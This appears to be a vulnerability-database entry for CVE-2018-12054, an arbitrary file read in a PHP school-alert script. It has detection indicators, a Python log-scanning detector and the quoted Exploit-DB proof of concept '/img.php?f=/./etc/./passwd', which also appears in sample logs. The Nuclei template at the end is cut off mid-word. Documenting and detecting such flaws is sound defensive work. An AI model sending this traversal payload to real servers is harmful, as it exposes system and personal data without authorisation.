CVE-2018-12054
Published: 2018-06-08
CVE-2018-12054: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
Priority: P2 (64, high) · CVSS 3.0 base score: 7.5
EPSS: 39.39% (98.4th percentile)
Detection & IOCs (extracted from sources)
YARA / regex indicator: `root:.*:0:0:`
- The vulnerability is triggered via the `f` parameter in `img.php` using absolute path traversal with dot-segment obfuscation (e.g., /./etc/./passwd). Monitor GET requests to img.php with path traversal patterns in the `f` parameter.
- A successful exploitation response will contain the content of /etc/passwd, detectable by the regex pattern `root:.*:0:0:` in the HTTP response body with a 200 status code.
- The traversal payload uses dot-segment obfuscation (/./etc/./passwd) rather than classic ../ sequences, meaning standard path traversal WAF rules may not catch this variant.
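As an added defender-side example (not code from the indexed sources), the following Python script applies the two signals above to constructed access-log lines and a response body: it normalizes the `f` parameter so dot-segment obfuscation such as /./etc/./passwd collapses to /etc/passwd before matching (which is why a plain `../` rule misses it), and it checks response bodies for `root:.*:0:0:` with a 200 status. The log lines, `scan_access_log` and `leaked_passwd` are constructed for this example.

```python
"""Detect CVE-2018-12054 probes against img.php in access logs and confirm
leaks in response bodies. Added example; all log lines are constructed."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: only method, request target and status are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Response indicator from the sources: a root entry from /etc/passwd.
LEAK_RE = re.compile(r"root:.*:0:0:")

def normalize_f(value: str) -> str:
    """Decode (twice, to cover double-encoded payloads) and collapse dot
    segments, so /./etc/./passwd and %2F.%2Fetc%2F.%2Fpasswd both become
    /etc/passwd. This is what a naive '../' signature never sees."""
    return posixpath.normpath(unquote(unquote(value)))

def suspicious_f(value: str) -> bool:
    """Flag absolute paths and any traversal that escapes the web root."""
    norm = normalize_f(value)
    return norm.startswith("/") or norm.startswith("..")

def scan_access_log(lines):
    """Return (status, raw f value, normalized path) for every GET to
    img.php whose f parameter looks like a traversal attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m.group("method") != "GET":
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/img.php"):
            continue
        for f in parse_qs(parts.query).get("f", []):
            if suspicious_f(f):
                hits.append((int(m.group("status")), f, normalize_f(f)))
    return hits

def leaked_passwd(status: int, body: str) -> bool:
    """Confirmation signal: HTTP 200 plus a root:...:0:0: line in the body."""
    return status == 200 and LEAK_RE.search(body) is not None

SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [08/Jun/2018:10:00:01 +0000] "GET /img.php?f=logo.png HTTP/1.1" 200 4213',
    '10.0.0.9 - - [08/Jun/2018:10:00:02 +0000] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 200 1421',
    '10.0.0.9 - - [08/Jun/2018:10:00:03 +0000] "GET /img.php?f=%2F.%2Fetc%2F.%2Fpasswd HTTP/1.1" 200 1421',
    '10.0.0.9 - - [08/Jun/2018:10:00:04 +0000] "GET /index.php?f=../../etc/passwd HTTP/1.1" 404 0',
    '10.0.0.9 - - [08/Jun/2018:10:00:05 +0000] "GET /img.php?f=../../../etc/passwd HTTP/1.1" 200 1421',
]

if __name__ == "__main__":
    for status, raw, norm in scan_access_log(SAMPLE_LOG):
        print(f"ALERT img.php f={raw!r} -> {norm} (status {status})")
```

Pair the request-side hits with the response check in a proxy or IDS that sees bodies; the log scan alone shows the attempt, not whether the file was actually returned.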
CVSS provenance
- NVD v3.0: 7.5 HIGH, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
Schools Alert Management Script - Arbitrary File Read
exploitdb · 2018-06-11 · CVSS 7.5
CVE-2018-12054 [HIGH] Schools Alert Management Script - Arbitrary File Read
---
```text
# Exploit Title: Schools Alert Management Script - Arbitrary File Read
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054
# Proof of Concept:
/img.php?f=/./etc/./passwd
```
Nuclei
Schools Alert Management Script - Arbitrary File Read
nuclei · CVSS 7.5
CVE-2018-12054 [HIGH] Schools Alert Management Script - Arbitrary File Read
Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
Template:
```yaml
id: CVE-2018-12054

info:
  name: Schools Alert Management Script - Arbitrary File Read
  author: wisnupramoedya
  severity: high
  description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerabili
```
No writeups or analysis indexed.
Published: 2018-06-08